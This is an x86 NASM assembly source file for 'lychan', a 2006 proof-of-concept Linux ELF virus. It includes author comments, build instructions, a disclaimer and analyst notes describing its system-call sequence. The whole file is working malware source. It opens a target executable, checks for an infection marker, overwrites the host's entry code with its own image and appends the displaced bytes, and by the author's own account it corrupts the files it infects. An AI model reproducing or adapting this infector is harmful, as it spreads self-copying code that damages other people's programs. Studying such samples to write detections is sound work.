;-------------------------------------------------------------------------------------------
;lychan (c)opyright 2006 by lclee_vx
;
;
;lychan is an ELF infector on Linux systems with a simple infection algorithm.
;This is a simple example of an ELF binary infection, tested on Red Hat 8.0
;
;To assemble it:
; nasm -f elf -F stabs -g lychan.asm
; ld -o lychan lychan.o
; ./elfwrsec lychan
;
;Description:
; 1. Get the elfwrsec tool by The King (c)
;
; 2. This lychan virus infection method is inspired by the winux virus coded by benny/29A.
;    I will try to come up with my own infection methods later, sigh.....forgive me because
;    I just spent 3 weeks to code this stuff. :p
;
; 3. This is just a proof of concept of how to code a virus on Linux; this virus
;    will copy itself into ELF files. Unfortunately, it will corrupt the target files.
;    The bug still needs to be fixed. :( !!
;
; 4. The virus just scans for the ELF file named "f13labs" in the current directory only.
;
; 5. If you want to test this virus, just rename any ELF file on your Linux system to "f13labs"
;    and put it into the same directory as the virus "lychan"
;
;
;That is about all, folks. The code is heavily commented, so it should be easy enough to follow.
;
;
; Disclaimer
; ------------
;THIS CODE IS MEANT FOR EDUCATIONAL PURPOSES ONLY.
;THE AUTHOR CANNOT BE HELD RESPONSIBLE FOR ANY
;DAMAGE CAUSED DUE TO USE, MISUSE OR INABILITY TO USE THE SAME
;
;Author : lclee_vx
;Group  : F-13 Labs
;Web    : http://f13.host.sk
;Email  : lclee_vx@yahoo.com
;
;Credit : Thanks go to Benny/29A, the algorithm mapped the virus into memory is cool
;
;----------------------------------------------------------------------------------------------------
;Analyst notes (what the code below observably does; useful when reviewing the sample or
;writing detections for it):
;  - Syntax: NASM, 32-bit Linux (i386) ABI, raw `int 80h` system calls, no libc.
;  - Position independence: `call Delta / pop ebp / sub ebp, Delta` leaves the load slide in
;    ebp; every reference to the image's own data is written [ebp+label].
;  - System-call sequence at run time: mprotect(own page, 0x4000 bytes, prot 7 = RWX)
;    -> write(1, "Hello\n\0", 7) -> open("./f13labs", O_RDWR) -> lseek(fd, 0, SEEK_END)
;    -> old_mmap(MapArg block) -> munmap (when mapped) -> write(fd, displaced entry bytes)
;    (infection path only) -> close(fd) -> exit.
;  - Infection marker: the first dword at the host's entry code is compared with the first
;    dword of this image (the `call Delta` encoding); equal means "already infected".
;  - Hard-coded target path: "./f13labs" (see TargetFile); nothing else is ever opened.
;----------------------------------------------------------------------------------------------------
bits 32
global _start

section .text

;-----------------------------------------------------------------------
; _start
; Entry point of the stand-alone sample (and of the bytes copied into a
; host).  No inputs.  Never returns: the `call SYS_exit` at OldEntry is
; reached after BeginInfect comes back through MapFail.
; Register roles: ebp = load slide (delta); ebx/ecx/edx = syscall args;
; eax = syscall result; esi = mapping address handed to BeginInfect.
;-----------------------------------------------------------------------
_start:
        call    Delta
Delta:
        pop     ebp                             ; ebp = run-time address of Delta
        sub     ebp, Delta                      ; ebp = run-time addr - link addr (delta); own data is [ebp+label]

        mov     edx, 07h                        ; prot = 7 (PROT_READ|PROT_WRITE|PROT_EXEC)
        mov     ecx, 04000h                     ; len  = 0x4000 bytes
        lea     ebx, [ebp+_start]
        and     ebx, 0FFFFF000h                 ; page-align the address of our own code
        call    SYS_mprotect                    ; own pages (code and the data at the end) become RWX; eax is not examined

        mov     edx, dword [ebp+MsgLength]      ;Message Length (7: "Hello", LF, NUL)
        lea     ecx, [ebp+Msg]                  ;Message
        mov     ebx, 01                         ;stdout
        call    SYS_write                       ;SYS.WRITE

        mov     ecx, 02                         ;O_RDWR
        lea     ebx, [ebp+TargetFile]           ;load the target file ("./f13labs")
        call    SYS_open                        ;open the target file
        mov     ebx, eax                        ;ebx=file descriptor
        mov     dword [ebp+FileHandle], eax     ;save
;--------------------------------------------------------------------------------
;change file pointer of file ref-d by fd
;--------------------------------------------------------------------------------
        mov     edx, 2                          ;SEEK_END, add disp to end of file
        xor     ecx, ecx                        ; offset 0: lseek returns the file size and leaves the fd positioned at EOF
        call    SYS_lseek
        xchg    eax, ecx                        ;ecx=size of file
        mov     dword [ebp+FileSize], ecx       ;file size, save it

        mov     ebx, dword [ebp+FileHandle]     ;ebx=FileHandle
        call    MapFile                         ;map the file in memory (ecx = length, ebx = fd)
        cmp     eax, -1                         ;error?
        je      near MapFail                    ;failed
        mov     dword [ebp+MapAddress], eax     ;save the mapping address

        push    eax
        pop     esi                             ;esi=mapping address
        call    BeginInfect
OldEntry:
        call    SYS_exit                        ; exit(ebx); ebx is whatever MapFail last loaded (the file handle)

;-----------------------------------------------------------------------------------
;Start Infect the target file
;1. check the signature of ELF
;2. values of e_ehsize (elf header size), eh_entrypoint (entry point), eh_ph_count(ph number)
;   , eh_ph_entrysize (ph entry size)
;3. p_addr+p_memsz > e_entry
;
; In:    esi = MapAddress (start of the mapped target file), ebp = delta
; Out:   nothing meaningful in registers; every path returns through MapFail (close fd)
; Clobb: eax, ebx, ecx, edx, esi, edi, flags; borrows VxEnd-_start bytes of stack
; Side effects, infection path: overwrites the host's entry code inside the shared
;        mapping with this image, appends the displaced original bytes to the end of
;        the file, then munmap + close.  Other paths: munmap (if mapped) + close.
;-----------------------------------------------------------------------------------
BeginInfect:
        mov     eax, dword [esi]
        cmp     eax, 0x464C457F                 ;ELF ?  ("\x7FELF" read as a little-endian dword)
        jne     near UnMap
        mov     edi, esi                        ;edi=map address
        movzx   eax, word [esi+28h]             ;e_ehsize
        mov     ebx, dword [esi+18h]            ;e_entry
        movzx   ecx, word [esi+2ch]             ;e_phnum (loop counter for CheckPhdr)
        movzx   edx, word [esi+2ah]             ;e_phentsize
        add     edi, eax                        ;edi=point to Program Table Header (map + e_ehsize is taken as the table start)
CheckPhdr:
        mov     eax, dword [edi+0ch]            ;p_addr(physical address)
        add     eax, dword [edi+14h]            ;p_memsz (size of the segment in memory)
        cmp     ebx, eax                        ;e_entry < p_addr+p_memsz ?  (signed compare)
        jl      GotPhdr                         ;less
        add     edi, edx                        ;add e_phentsize, another segment
        loop    CheckPhdr                       ;loop (ecx = remaining program headers)
        jmp     UnMap                           ;we failed, jump out
GotPhdr:
        mov     esi, dword [esi+18h]            ;esi=e_entry
        mov     eax, dword [edi+08h]            ; p_vaddr
        sub     esi, eax                        ;esi=offset to entry code = e_entry-p_vaddr
        mov     ebx, esi                        ; ebx = that offset, kept for the size check below
        add     esi, dword [ebp+MapAddress]     ;esi=EIP (pointer to the entry code inside the mapping)
        mov     dword [ebp+OldEip], esi         ;save it
;----------------------------------------------------------------------------------
;check infected already?
;----------------------------------------------------------------------------------
        mov     eax, dword [ebp+_start]         ; first dword of this image (the `call Delta` bytes)
        cmp     dword [esi], eax                ; the same bytes at the host entry = marker present
        jz      UnMap                           ;infected
;-----------------------------------------------------------------------------------
;check enough space for us to insert the virus?
;-----------------------------------------------------------------------------------
        mov     eax, dword [edi+14h]            ;p_memsz (size of the segment in memory)
        sub     eax, ebx                        ;p_memsz - offset to entry code
        mov     ecx, VxEnd - _start             ;ecx = length virus
        cmp     eax, ecx
        jb      near UnMap                      ;segment too small
;-------------------------------------------------------------------------------------
;Creating the frame for us to insert code
;write the frame & virus
;-------------------------------------------------------------------------------------
        sub     esp, VxEnd - _start             ; stack buffer, one image length long
        mov     edi, esp
        mov     ecx, VxEnd - _start
        rep     movsb                           ; save the host's original entry bytes (esi = OldEip) into the buffer
        mov     edi, [ebp+OldEip]
        mov     ecx, VxEnd - _start
        lea     esi, [ebp+_start]
        rep     movsb                           ; copy this image over the host entry code (mapping is MAP_SHARED, so the stores reach the file)
;---------------------------------------------------------------------------------------
;Unmap
;---------------------------------------------------------------------------------------
        mov     ecx, dword [ebp+FileSize]
        mov     ebx, dword [ebp+MapAddress]
        call    SYS_munmap
        mov     edx, VxEnd - _start
        mov     ecx, esp                        ; the saved original entry bytes
        mov     ebx, dword [ebp+FileHandle]
        call    SYS_write                       ; fd offset is still at EOF (from the SEEK_END above), so these bytes are appended
        add     esp, VxEnd - _start             ; release the stack buffer
        jmp     MapFail
UnMap:
        mov     ecx, dword [ebp+FileSize]
        mov     ebx, dword [ebp+MapAddress]
        call    SYS_munmap
MapFail:
        mov     ebx, dword [ebp+FileHandle]
        call    SYS_close
OpenFail:
        ret

;------------------------------------------------------------------------------------
;This routine is for mapping the file in memory
; In:    ecx = length (file size), ebx = file descriptor, ebp = delta
; Out:   eax = result of the mmap system call (mapping address on success)
; Clobb: esi (left pointing at MapArg), ebx, eax, flags
; Uses the old_mmap form (syscall 90): ebx points at the 6-dword argument block MapArg.
;------------------------------------------------------------------------------------
MapFile:
        lea     esi, [ebp+MapArg]               ;load the map structure
        mov     dword [esi+04h], ecx            ;set the file size (_len)
        mov     dword [esi+10h], ebx            ;set the file handle (_fd)
        mov     ebx, esi                        ;ebx=Map structure address
        call    SYS_mmap                        ;start map to memory
        ret

;----------------------------------------------------------------------------------
;important routine to mprotect, write, call, open, mmap, munmap, exit
; Each stub loads the i386 Linux system-call number into eax and issues `int 80h`;
; the arguments are already in ebx, ecx, edx as set by the caller and the result
; comes back in eax.  Only eax (and flags) change.
;----------------------------------------------------------------------------------
SYS_lseek:                                      ; 19 = lseek(ebx fd, ecx offset, edx whence)
        mov     eax, 19
        int     80h
        ret
SYS_write:                                      ; 4 = write(ebx fd, ecx buf, edx count)
        mov     eax, 4
        int     80h
        ret
SYS_open:                                       ; 5 = open(ebx path, ecx flags)
        mov     eax, 5
        int     80h
        ret
SYS_mprotect:                                   ; 125 = mprotect(ebx addr, ecx len, edx prot)
        mov     eax, 125
        int     80h
        ret
SYS_mmap:                                       ; 90 = old_mmap(ebx -> 6-dword argument block)
        mov     eax, 90
        int     80h
        ret
SYS_munmap:                                     ; 91 = munmap(ebx addr, ecx len)
        mov     eax, 91
        int     80h
        ret
SYS_close:                                      ; 6 = close(ebx fd)
        mov     eax, 6
        int     80h
        ret
SYS_exit:                                       ; 1 = exit(ebx status); does not return
        mov     eax, 1
        int     80h
        ret

;---------------------------------------------------------------------------------
;Parameter
; Writable data kept inside .text; it is made writable by the mprotect at _start
; (the whole image is far smaller than the 0x4000 bytes that call covers).
;----------------------------------------------------------------------------------
Msg             db "Hello", 0ah, 0              ; "Hello\n" plus a NUL
MsgLength       dd $-Msg                        ; 7 -- the NUL is written to stdout as well
FileHandle      dd 00000000h                    ; fd of the target file
FileSize        dd 00000000h                    ; from lseek(fd, 0, SEEK_END)
MapAddress      dd 00000000h                    ; from mmap
OldEip          dd 00000000h                    ; address of the host's entry code inside the mapping
TargetFile      db "./f13labs", 0               ; hard-coded target path (the only file ever opened)
MapArg:                                         ; argument block for old_mmap (syscall 90)
                dd 00000000h                    ;*_addr  (0: let the kernel choose)
                dd 00000000h                    ;_len    (filled in by MapFile)
                dd 00000003h                    ;_prot   (3 = PROT_READ|PROT_WRITE)
                dd 00000001h                    ;_flags  (1 = MAP_SHARED: stores go through to the file)
                dd 00000000h                    ;_fd     (filled in by MapFile)
                dd 00000000h                    ;_offset
VxEnd:                                          ; end of the image; VxEnd - _start = number of bytes copied into a host